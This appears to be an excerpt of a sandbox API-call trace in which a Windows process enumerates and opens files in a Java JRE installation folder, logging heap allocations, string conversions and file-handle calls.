lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll", lpUsedDefaultChar=0x0) returned 52 [0094.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0094.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0094.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0094.173] AreFileApisANSI () returned 1 [0094.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0094.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0094.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll") returned 52 [0094.173] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\wsdetect.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.174] GetFileType (hFile=0x360) returned 0x1 [0094.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0094.174] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.174] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.174] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.175] CloseHandle (hObject=0x360) returned 1 [0094.175] AreFileApisANSI () returned 1 [0094.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0094.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0094.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x465f8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll") returned 52 [0094.175] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\wsdetect.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.175] GetFileType (hFile=0x360) returned 0x1 [0094.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0094.175] CloseHandle (hObject=0x360) returned 1 [0094.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.176] AreFileApisANSI () returned 1 [0094.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0094.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x466d8 [0094.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x466d8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll") returned 52 [0094.176] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\wsdetect.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2f040)) returned 1 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0094.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0094.176] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.177] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="zip.dll", cAlternateFileName="")) returned 1 [0094.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0094.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0094.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0094.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0094.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0094.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0094.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0094.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0094.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0094.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0094.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0094.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0094.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0094.177] AreFileApisANSI () returned 1 [0094.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll", lpUsedDefaultChar=0x0) returned 47 [0094.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0094.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0094.177] AreFileApisANSI () returned 1 [0094.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0094.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71550 [0094.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71550, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll") returned 47 [0094.178] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\zip.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.178] GetFileType (hFile=0x360) returned 0x1 [0094.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0094.178] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.178] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.178] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.178] CloseHandle (hObject=0x360) returned 1 [0094.180] AreFileApisANSI () returned 1 [0094.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0094.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71550 [0094.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71550, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll") returned 47 [0094.180] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\zip.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.180] GetFileType (hFile=0x360) returned 0x1 [0094.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0094.181] CloseHandle (hObject=0x360) returned 1 [0094.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0094.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0094.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.181] AreFileApisANSI () returned 1 [0094.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0094.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0094.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll") returned 47 [0094.181] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\zip.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13040)) returned 1 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.182] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.182] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.182] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5c, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46830, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5c, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\z", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓぀\x01⺊Āgr먤聤̓㑍Ā̓蘐\x07̓뻌聤぀\x01぀\x01.8.0_144\\bin\\zip.dll")) returned 0 [0094.182] FindClose (in: hFindFile=0x78610 | out: hFindFile=0x78610) returned 1 [0094.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0094.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0094.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0094.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0094.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0094.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0094.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0094.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a630 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0094.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0094.183] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.183] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.183] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.183] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0094.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.183] AreFileApisANSI () returned 1 [0094.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT", lpUsedDefaultChar=0x0) returned 45 [0094.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.183] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.183] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0094.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0094.183] AreFileApisANSI () returned 1 [0094.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0094.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71828 [0094.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71828, cchWideChar=45 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 45 [0094.183] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0094.184] GetFileType (hFile=0x27c) returned 0x1 [0094.184] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0094.184] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.184] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.184] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 